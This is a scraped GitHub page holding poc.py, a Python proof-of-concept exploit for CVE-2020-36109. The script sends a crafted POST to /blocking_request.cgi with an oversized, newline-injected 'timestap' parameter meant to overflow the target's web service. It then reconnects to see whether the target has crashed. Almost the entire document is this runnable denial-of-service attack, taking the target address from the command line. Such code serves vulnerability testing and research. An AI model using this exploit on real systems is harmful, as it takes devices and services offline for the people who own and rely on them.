forked from sunn1day/CVE-2020-36109-POC
-
Notifications
You must be signed in to change notification settings - Fork 0
/
poc.py
94 lines (76 loc) · 2.66 KB
/
poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#!/usr/bin/env python
import socket
import sys
import time
import hexdump
CVE = "CVE-2020-36109"
HOST = "127.0.0.1"
PORT = 80
def recvuntil(s,timeout=5):
check_lst = ["<html><head>","<script>parent.location.href='/index.asp';</script>\x0a<meta http-equiv=\"Content-Type\" content=\"text/html\">","</head></html>"]
check_str = "{}\x0d\x0a".format("\x0d\x0a".join(check_lst))
data = ''
tmp_data = '1'
try :
while tmp_data != '' :
s.settimeout(timeout)
tmp_data = s.recv(1024*8).decode('utf-8')
data += tmp_data
except socket.timeout :
pass
done = True if data.endswith(check_str) else False
return done, data
def header():
buff = ""
buff += "POST /blocking_request.cgi HTTP/1.1\r\n"
buff += "Host: {}:{}\r\n".format(HOST, PORT)
buff += "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
buff += "Accept: */*\r\n"
buff += "Accept-Language: en-US,en;q=0.5\r\n"
buff += "Accept-Encoding: gzip, deflate\r\n"
buff += "Connection: keep-alive\r\n"
buff += "Referer: http://{}:{}/\r\n".format(HOST, PORT)
buff += "Sec-GPC: 1\r\n"
buff += "Origin: http://{}:{}\r\n".format(HOST, PORT)
buff += "Pragma: no-cache\r\n"
buff += "Cache-Control: no-cache\r\n"
return buff
def dos():
buff = header()
mac = "mac=%00"
timestap = "timestap={}".format( int(time.time()) + 3600 + 5) + "%0a" + "A"*(0x1000-0xc-1) + "BBBB"
buff1 = "interval=0&CName=whatever&" + timestap + "&" + mac
buff += "Content-Length: {}\r\n".format(len(buff1))
buff += "\r\n"
buff += buff1
return buff
if sys.argv[1] == "-h" or sys.argv[1] == "--help" :
print("# Example usage: 'python3 {} <target-ip> <port>'\n".format(sys.argv[0]))
sys.exit(0)
HOST = sys.argv[1]
PORT = 80
if len(sys.argv) > 2 :
PORT = int(sys.argv[2])
if __name__ == "__main__" :
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
buff = dos().encode('utf-8')
hexdump0 = hexdump.hexdump(buff, result='return')
print("[-] Sending:")
print("{}{}{}".format(hexdump0[:2233]," ... : .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ... \n", hexdump0[-226:]))
s.send(buff)
done, body = recvuntil(s)
if done :
hexdump0 = hexdump.hexdump(body.encode('utf-8'), result='return')
print("\n[-] Recieving:")
print(hexdump0)
try :
time.sleep(4)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print("[x] Good, target isn't vulnerable to {}".format(CVE))
except socket.error:
print("[+] Target is vulnerable to {}".format(CVE))
print("[+] DONE")
else :
print("[X] Sems that target isn't doing the '/blocking_request.cgi' action right")